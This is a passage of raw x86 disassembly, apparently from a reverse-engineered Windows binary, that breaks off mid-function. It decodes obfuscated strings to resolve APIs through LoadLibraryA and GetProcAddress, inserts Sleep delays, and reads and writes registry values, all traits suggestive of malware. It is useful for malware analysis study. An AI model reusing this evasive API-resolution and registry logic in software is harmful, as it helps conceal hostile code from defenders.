push dword ptr [ebp-14h]
call sub_4221DB
test eax, eax
pop ecx
jz short loc_4261AC
push 1
push dword ptr [ebp-18h]
push dword ptr [ebp-14h]
call sub_421D8A
add esp, 0Ch
loc_4261AC: ; CODE XREF: sub_425FC6+1D4�j
mov eax, [edi+20h]
push 1
push dword ptr [ebp-14h]
push eax
call sub_421D8A
add esp, 0Ch
test eax, eax
jz short loc_4261CD
lea eax, [ebp-14h]
lea ecx, [edi+20h]
push eax
call sub_431648
loc_4261CD: ; CODE XREF: sub_425FC6+1AE�j
; sub_425FC6+1F9�j
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-30h], esp
push offset aDefaultvalue ; "defaultvalue"
call sub_43162A
push ecx
mov ecx, edi
mov eax, esp
mov [ebp-2Ch], esp
push 72h
push offset a11866787a5f240 ; "11866787A5F240675EE6610530A652BC94C74E7"...
push eax
mov byte ptr [ebp-4], 9
call sub_42309C
lea ecx, [ebp-74h]
mov byte ptr [ebp-4], 3
call sub_42692B
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 0Ah
call sub_43164E
push offset aWr ; "WR"
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 0Bh
call sub_43163C
push 22h
call esi ; Sleep
push ebx
lea ecx, [ebp-1Ch]
call sub_431678
push 0Eh
lea eax, [ebp-2Ch]
push offset a34ac53a09bdc7c ; "34AC53A09BDC7C"
push eax
mov ecx, edi
call sub_42309C
push eax
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 0Ch
call sub_431684
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 0Bh
call sub_431642
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-30h], esp
push edi
call sub_431636
push ecx
lea eax, [ebp-1Ch]
mov ecx, esp
mov [ebp-2Ch], esp
push eax
mov byte ptr [ebp-4], 0Dh
call sub_431636
lea ecx, [ebp-54h]
mov byte ptr [ebp-4], 0Bh
call sub_42692B
lea eax, [ebp-24h]
lea ecx, [ebp-74h]
push eax
mov byte ptr [ebp-4], 0Eh
call sub_426D5C
lea eax, [ebp-24h]
lea ecx, [ebp-2Ch]
push eax
mov byte ptr [ebp-4], 0Fh
call sub_431636
mov byte ptr [ebp-4], 10h
push eax
lea ecx, [edi+24h]
call sub_431648
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 0Fh
call sub_431642
lea ecx, [ebp-24h]
mov byte ptr [ebp-4], 0Eh
call sub_431642
push dword ptr [edi]
mov ebx, dword_4331A8
call ebx ; atoi
pop ecx
mov [ebp-2Ch], eax
push 2Ch
mov dword ptr [ebp-4], 0Eh
call esi ; Sleep
and dword ptr [ebp-20h], 0
lea eax, [edi+14h]
mov [ebp-24h], eax
loc_4262F8: ; CODE XREF: sub_425FC6+37F�j
lea eax, [ebp-28h]
lea ecx, [ebp-54h]
push eax
call sub_426D5C
mov ecx, [ebp-24h]
lea eax, [ebp-28h]
push eax
mov byte ptr [ebp-4], 13h
call sub_431648
lea ecx, [ebp-28h]
mov byte ptr [ebp-4], 0Eh
call sub_431642
mov eax, [ebp-24h]
push dword ptr [eax]
call ebx ; atoi
cmp eax, [ebp-2Ch]
pop ecx
mov [ebp-30h], eax
mov dword ptr [ebp-4], 0Eh
jge short loc_426347
push 0F81h
call esi ; Sleep
inc dword ptr [ebp-20h]
cmp dword ptr [ebp-20h], 0Ah
jl short loc_4262F8
loc_426347: ; CODE XREF: sub_425FC6+36F�j
mov eax, [ebp-2Ch]
cmp [ebp-30h], eax
jle short loc_426355
mov byte ptr [edi+18h], 1
jmp short loc_42636F
; ---------------------------------------------------------------------------
loc_426355: ; CODE XREF: sub_425FC6+387�j
and byte ptr [edi+18h], 0
push ecx
mov ecx, esp
mov [ebp-30h], esp
push dword ptr [ebp-24h]
call sub_431636
lea ecx, [ebp-54h]
call sub_426DB8
loc_42636F: ; CODE XREF: sub_425FC6+38D�j
lea ecx, [ebp-54h]
mov byte ptr [ebp-4], 0Bh
call sub_426ABF
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 0Ah
call sub_431642
lea ecx, [ebp-74h]
mov byte ptr [ebp-4], 3
call sub_426ABF
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 2
call sub_431642
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_431642
and byte ptr [ebp-4], 0
lea ecx, [ebp-14h]
call sub_431642
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_431642
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_425FC6 endp
; =============== S U B R O U T I N E =======================================
sub_4263D6 proc near ; CODE XREF: sub_422C48+209�p
mov eax, offset loc_432394
call sub_43176A ; _EH_prolog
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp-18h]
mov [ebp-10h], esp
push 16h
push offset a31a144bf9e8020 ; "31A144BF9E80200C66C764"
mov edi, ecx
push eax
call sub_42309C
push dword ptr [eax]
call dword_4330DC ; LoadLibraryA
lea ecx, [ebp-18h]
mov [ebp-14h], eax
call sub_431642
cmp dword ptr [ebp-14h], 0
jz short loc_426478
push 1Ch
lea eax, [ebp-1Ch]
push offset a11a144bf9ef66a ; "11A144BF9EF66A4761DE7C0307B1"
push eax
mov ecx, edi
call sub_42309C
push dword ptr [eax]
push dword ptr [ebp-14h]
call dword_433060 ; GetProcAddress
lea ecx, [ebp-1Ch]
mov ebx, eax
call sub_431642
test ebx, ebx
jz short loc_42646F
mov esi, dword_4330E0
push 28h
call esi ; Sleep
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset aSei ; "sei \n"
call sub_43162A
mov ecx, edi
call sub_424AD9
push 2Ch
call esi ; Sleep
and dword ptr [ebp-4], 0
mov eax, eax
push dword ptr [ebp+8]
call ebx ; atoi
loc_42646F: ; CODE XREF: sub_4263D6+67�j
; DATA XREF: sub_42648B�o
push dword ptr [ebp-14h]
call dword_433054 ; FreeLibrary
loc_426478: ; CODE XREF: sub_4263D6+3C�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_4263D6 endp
; =============== S U B R O U T I N E =======================================
sub_42648B proc near ; DATA XREF: HLXc:004356F4�o
mov eax, offset loc_42646F
retn
sub_42648B endp
; =============== S U B R O U T I N E =======================================
sub_426491 proc near ; CODE XREF: sub_424AE5+3FE�p
; sub_424AE5+416�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call dword_433078 ; lstrcatA
retn 8
sub_426491 endp
; =============== S U B R O U T I N E =======================================
sub_4264A2 proc near ; CODE XREF: sub_42342D+69�p
; sub_42342D+BD4�p ...
mov eax, [ecx]
test eax, eax
jz short locret_4264AE
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_4264AE: ; CODE XREF: sub_4264A2+4�j
retn
sub_4264A2 endp
; =============== S U B R O U T I N E =======================================
sub_4264AF proc near ; CODE XREF: sub_42342D+61�p
; sub_42342D+BC9�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push edi
mov edi, [esi]
cmp edi, eax
jz short loc_4264D3
test eax, eax
mov [esi], eax
jz short loc_4264C9
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_4264C9: ; CODE XREF: sub_4264AF+12�j
test edi, edi
jz short loc_4264D3
mov eax, [edi]
push edi
call dword ptr [eax+8]
loc_4264D3: ; CODE XREF: sub_4264AF+C�j
; sub_4264AF+1C�j
mov eax, esi
pop edi
pop esi
retn 4
sub_4264AF endp
; =============== S U B R O U T I N E =======================================
sub_4264DA proc near ; CODE XREF: sub_42342D+77�p
; sub_42342D+47A�p ...
arg_0 = dword ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_4264EE
push 80004003h
call sub_431952
loc_4264EE: ; CODE XREF: sub_4264DA+8�j
xor eax, eax
cmp [esi], eax
pop esi
setz al
retn 4
sub_4264DA endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4323A9
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov ecx, [ebp-10h]
call sub_4281D0
mov dword ptr [ebp-4], 0
mov eax, [ebp-10h]
mov dword ptr [eax+10h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+14h], 0
push offset dword_439CA8
mov ecx, [ebp-10h]
add ecx, 8
call sub_43163C
mov edx, [ebp-10h]
mov dword ptr [edx], 80000001h
mov eax, [ebp-10h]
mov dword ptr [eax+18h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+1Ch], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426584 proc near ; CODE XREF: sub_42342D+3B6�p
; sub_424AE5+267�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_426584
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push esi
mov [ebp+var_18], ecx
mov [ebp+var_4], 0
mov ecx, [ebp+var_18]
call sub_4281D0
mov byte ptr [ebp+var_4], 1
mov eax, [ebp+var_18]
mov dword ptr [eax+10h], 0
mov ecx, [ebp+var_18]
mov edx, [ebp+arg_4]
mov [ecx+14h], edx
mov eax, [ebp+var_18]
mov ecx, [ebp+arg_8]
mov [eax+1Ch], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+arg_C]
mov [edx], eax
mov ecx, [ebp+var_18]
mov dword ptr [ecx+18h], 0
push offset asc_437534 ; "\\"
lea ecx, [ebp+arg_0]
call sub_431696
push 5Ch
lea ecx, [ebp+arg_0]
call sub_431666
push eax
lea edx, [ebp+var_10]
push edx
lea ecx, [ebp+arg_0]
call sub_431660
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_20]
push ecx
mov ecx, [ebp+var_18]
add ecx, 0Ch
call sub_431648
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_10]
call sub_431642
push offset asc_437538 ; "\\"
mov ecx, [ebp+var_18]
add ecx, 0Ch
call sub_431690
lea ecx, [ebp+arg_0]
call sub_428280
mov esi, eax
push 5Ch
lea ecx, [ebp+arg_0]
call sub_431666
sub esi, eax
push esi
lea edx, [ebp+var_14]
push edx
lea ecx, [ebp+arg_0]
call sub_43168A
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_28], eax
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_28]
push ecx
mov ecx, [ebp+var_18]
add ecx, 8
call sub_431648
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_14]
call sub_431642
push offset asc_43753C ; "\\"
mov ecx, [ebp+var_18]
add ecx, 8
call sub_431696
push offset asc_437540 ; "\\"
mov ecx, [ebp+var_18]
add ecx, 8
call sub_431690
mov ecx, [ebp+var_18]
call sub_4266E9
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_431642
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 10h
sub_426584 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4266D6 proc near ; CODE XREF: sub_42342D+3D7�p
; sub_424AE5+6AC�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_428230
mov esp, ebp
pop ebp
retn
sub_4266D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4266E9 proc near ; CODE XREF: sub_426584+12A�p
; sub_426816+24�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_C]
add ecx, 0Ch
call sub_4226A0
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
push edx
call dword_433004 ; RegOpenKeyExA
test eax, eax
jnz short loc_426785
mov [ebp+var_4], 4
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_C]
add ecx, 10h
push ecx
lea edx, [ebp+var_8]
push edx
push 0
mov ecx, [ebp+var_C]
add ecx, 8
call sub_4226A0
push eax
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_433010 ; RegQueryValueExA
test eax, eax
jnz short loc_426770
mov edx, [ebp+var_C]
mov dword ptr [edx+18h], 1
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_433000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+10h]
jmp short loc_42678B
; ---------------------------------------------------------------------------
loc_426770: ; CODE XREF: sub_4266E9+66�j
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_433000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+14h]
jmp short loc_42678B
; ---------------------------------------------------------------------------
loc_426785: ; CODE XREF: sub_4266E9+31�j
mov eax, [ebp+var_C]
mov eax, [eax+14h]
loc_42678B: ; CODE XREF: sub_4266E9+85�j
; sub_4266E9+9A�j
mov esp, ebp
pop ebp
retn
sub_4266E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42678F proc near ; CODE XREF: sub_426843+2C�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_439CAC
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4226A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_43300C ; RegCreateKeyExA
test eax, eax
jz short loc_4267D1
jmp short loc_426812
; ---------------------------------------------------------------------------
loc_4267D1: ; CODE XREF: sub_42678F+3E�j
push 4
mov ecx, [ebp+var_8]
add ecx, 10h
push ecx
push 4
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4226A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_433008 ; RegSetValueExA
test eax, eax
jnz short loc_426805
mov ecx, [ebp+var_8]
mov dword ptr [ecx+18h], 1
loc_426805: ; CODE XREF: sub_42678F+6A�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_433000 ; RegCloseKey
loc_426812: ; CODE XREF: sub_42678F+40�j
mov esp, ebp
pop ebp
retn
sub_42678F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426816 proc near ; CODE XREF: sub_424AE5+276�p
; sub_4255E6+98�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+18h], 0
jz short loc_426837
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+1Ch], 0
jnz short loc_426837
mov edx, [ebp+var_4]
mov eax, [edx+10h]
jmp short loc_42683F
; ---------------------------------------------------------------------------
loc_426837: ; CODE XREF: sub_426816+E�j
; sub_426816+17�j
mov ecx, [ebp+var_4]
call sub_4266E9
loc_42683F: ; CODE XREF: sub_426816+1F�j
mov esp, ebp
pop ebp
retn
sub_426816 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426843 proc near ; CODE XREF: sub_42342D+3C8�p
; sub_4255E6+D5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
cmp ecx, [eax+10h]
jnz short loc_426863
mov edx, [ebp+var_4]
cmp dword ptr [edx+1Ch], 0
jnz short loc_426863
mov eax, [ebp+var_4]
jmp short loc_426877
; ---------------------------------------------------------------------------
loc_426863: ; CODE XREF: sub_426843+10�j
; sub_426843+19�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
mov ecx, [ebp+var_4]
call sub_42678F
mov eax, [ebp+var_4]
loc_426877: ; CODE XREF: sub_426843+1E�j
mov esp, ebp
pop ebp
retn 4
sub_426843 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_432402
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov ecx, [ebp-10h]
call sub_4281D0
mov dword ptr [ebp-4], 0
mov ecx, [ebp-10h]
add ecx, 10h
call sub_43164E
mov byte ptr [ebp-4], 1
mov ecx, [ebp-10h]
add ecx, 14h
call sub_43164E
mov byte ptr [ebp-4], 2
push offset dword_439CB0
mov ecx, [ebp-10h]
add ecx, 10h
call sub_43163C
push offset dword_439CB4
mov ecx, [ebp-10h]
add ecx, 14h
call sub_43163C
push offset dword_439CB8
mov ecx, [ebp-10h]
add ecx, 8
call sub_43163C
mov eax, [ebp-10h]
mov dword ptr [eax], 80000001h
mov ecx, [ebp-10h]
mov dword ptr [ecx+18h], 0
mov edx, [ebp-10h]
mov dword ptr [edx+1Ch], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42692B proc near ; CODE XREF: sub_42342D+175�p
; sub_42342D+296�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_42692B
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push esi
mov [ebp+var_1C], ecx
mov [ebp+var_4], 1
mov ecx, [ebp+var_1C]
call sub_4281D0
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_1C]
add ecx, 10h
call sub_43164E
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_1C]
add ecx, 14h
call sub_43164E
mov byte ptr [ebp+var_4], 4
push offset dword_439CBC
mov ecx, [ebp+var_1C]
add ecx, 10h
call sub_43163C
lea eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_1C]
add ecx, 14h
call sub_431648
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_8]
mov [ecx+1Ch], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_C]
mov [eax], ecx
mov edx, [ebp+var_1C]
mov dword ptr [edx+18h], 0
push offset asc_437544 ; "\\"
lea ecx, [ebp+arg_0]
call sub_431696
push 5Ch
lea ecx, [ebp+arg_0]
call sub_431666
push eax
lea eax, [ebp+var_10]
push eax
lea ecx, [ebp+arg_0]
call sub_431660
mov [ebp+var_20], eax
mov ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov byte ptr [ebp+var_4], 5
mov edx, [ebp+var_24]
push edx
mov ecx, [ebp+var_1C]
add ecx, 0Ch
call sub_431648
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_10]
call sub_431642
push offset asc_437548 ; "\\"
mov ecx, [ebp+var_1C]
add ecx, 0Ch
call sub_431690
lea ecx, [ebp+arg_0]
call sub_428280
mov esi, eax
push 5Ch
lea ecx, [ebp+arg_0]
call sub_431666
sub esi, eax
push esi
lea eax, [ebp+var_14]
push eax
lea ecx, [ebp+arg_0]
call sub_43168A
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov [ebp+var_2C], ecx
mov byte ptr [ebp+var_4], 6
mov edx, [ebp+var_2C]
push edx
mov ecx, [ebp+var_1C]
add ecx, 8
call sub_431648
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_14]
call sub_431642
push offset asc_43754C ; "\\"
mov ecx, [ebp+var_1C]
add ecx, 8
call sub_431696
push offset asc_437550 ; "\\"
mov ecx, [ebp+var_1C]
add ecx, 8
call sub_431690
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_1C]
call sub_426B19
lea ecx, [ebp+var_18]
call sub_431642
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+arg_0]
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_4]
call sub_431642
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 10h
sub_42692B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426ABF proc near ; CODE XREF: sub_42342D+1A5�p
; sub_42342D+2C6�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_426ABF
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 1
mov ecx, [ebp+var_10]
add ecx, 14h
call sub_431642
mov byte ptr [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 10h
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
call sub_428230
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_426ABF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B19 proc near ; CODE XREF: sub_42692B+158�p
; sub_426D5C+45�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_426B19
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
mov [ebp+var_30], ecx
mov [ebp+var_2C], 0
mov eax, [ebp+var_30]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_30]
add ecx, 0Ch
call sub_4226A0
push eax
mov ecx, [ebp+var_30]
mov edx, [ecx]
push edx
call dword_433004 ; RegOpenKeyExA
test eax, eax
jnz loc_426C98
mov [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax
push 0
lea ecx, [ebp+var_18]
push ecx
push 0
mov ecx, [ebp+var_30]
add ecx, 8
call sub_4226A0
push eax
mov edx, [ebp+var_30]
mov eax, [edx+4]
push eax
call dword_433010 ; RegQueryValueExA
mov ecx, [ebp+var_10]
push ecx
call sub_431624
add esp, 4
mov [ebp+var_1C], eax
mov edx, [ebp+var_1C]
mov [ebp+var_14], edx
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_14]
push ecx
lea edx, [ebp+var_18]
push edx
push 0
mov ecx, [ebp+var_30]
add ecx, 8
call sub_4226A0
push eax
mov eax, [ebp+var_30]
mov ecx, [eax+4]
push ecx
call dword_433010 ; RegQueryValueExA
test eax, eax
jnz loc_426C5C
mov edx, [ebp+var_14]
push edx
lea ecx, [ebp+var_20]
call sub_43162A
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
mov [ebp+var_4], 0
mov ecx, [ebp+var_38]
push ecx
mov ecx, [ebp+var_30]
add ecx, 10h
call sub_431648
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_20]
call sub_431642
mov edx, [ebp+var_14]
mov [ebp+var_24], edx
mov eax, [ebp+var_24]
push eax
call sub_43161E
add esp, 4
mov ecx, [ebp+var_30]
mov dword ptr [ecx+18h], 1
mov edx, [ebp+var_30]
mov eax, [edx+4]
push eax
call dword_433000 ; RegCloseKey
mov ecx, [ebp+var_30]
add ecx, 10h
push ecx
mov ecx, [ebp+arg_0]
call sub_431636
mov edx, [ebp+var_2C]
or edx, 1
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
jmp short loc_426CB3
; ---------------------------------------------------------------------------
loc_426C5C: ; CODE XREF: sub_426B19+BD�j
mov eax, [ebp+var_14]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
push ecx
call sub_43161E
add esp, 4
mov edx, [ebp+var_30]
mov eax, [edx+4]
push eax
call dword_433000 ; RegCloseKey
mov ecx, [ebp+var_30]
add ecx, 14h
push ecx
mov ecx, [ebp+arg_0]
call sub_431636
mov edx, [ebp+var_2C]
or edx, 1
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
jmp short loc_426CB3
; ---------------------------------------------------------------------------
loc_426C98: ; CODE XREF: sub_426B19+4D�j
mov eax, [ebp+var_30]
add eax, 14h
push eax
mov ecx, [ebp+arg_0]
call sub_431636
mov ecx, [ebp+var_2C]
or ecx, 1
mov [ebp+var_2C], ecx
mov eax, [ebp+arg_0]
loc_426CB3: ; CODE XREF: sub_426B19+141�j
; sub_426B19+17D�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_426B19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426CC3 proc near ; CODE XREF: sub_426DB8+73�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_439CC0
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4226A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_43300C ; RegCreateKeyExA
test eax, eax
jz short loc_426D05
jmp short loc_426D58
; ---------------------------------------------------------------------------
loc_426D05: ; CODE XREF: sub_426CC3+3E�j
mov ecx, [ebp+var_8]
add ecx, 10h
call sub_428280
add eax, 1
push eax
mov ecx, [ebp+var_8]
add ecx, 10h
call sub_4226A0
push eax
push 1
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4226A0
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_433008 ; RegSetValueExA
test eax, eax
jnz short loc_426D4B
mov eax, [ebp+var_8]
mov dword ptr [eax+18h], 1
loc_426D4B: ; CODE XREF: sub_426CC3+7C�j
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_433000 ; RegCloseKey
loc_426D58: ; CODE XREF: sub_426CC3+40�j
mov esp, ebp
pop ebp
retn
sub_426CC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426D5C proc near ; CODE XREF: sub_424AE5+3BE�p
; sub_424AE5+516�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov [ebp+var_4], 0
mov eax, [ebp+var_8]
cmp dword ptr [eax+18h], 0
jz short loc_426D9A
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+1Ch], 0
jnz short loc_426D9A
mov edx, [ebp+var_8]
add edx, 10h
push edx
mov ecx, [ebp+arg_0]
call sub_431636
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
jmp short loc_426DB2
; ---------------------------------------------------------------------------
loc_426D9A: ; CODE XREF: sub_426D5C+17�j
; sub_426D5C+20�j
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_8]
call sub_426B19
mov edx, [ebp+var_4]
or edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
loc_426DB2: ; CODE XREF: sub_426D5C+3C�j
mov esp, ebp
pop ebp
retn 4
sub_426D5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426DB8 proc near ; CODE XREF: sub_42342D+196�p
; sub_42342D+2B7�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_426DB8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp+var_18], ecx
mov [ebp+var_4], 0
mov eax, [ebp+var_18]
add eax, 10h
push eax
lea ecx, [ebp+arg_0]
push ecx
call sub_4282C0
and eax, 0FFh
test eax, eax
jz short loc_426E19
mov edx, [ebp+var_18]
cmp dword ptr [edx+1Ch], 0
jnz short loc_426E19
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_431642
mov eax, [ebp+var_10]
jmp short loc_426E48
; ---------------------------------------------------------------------------
loc_426E19: ; CODE XREF: sub_426DB8+3C�j
; sub_426DB8+45�j
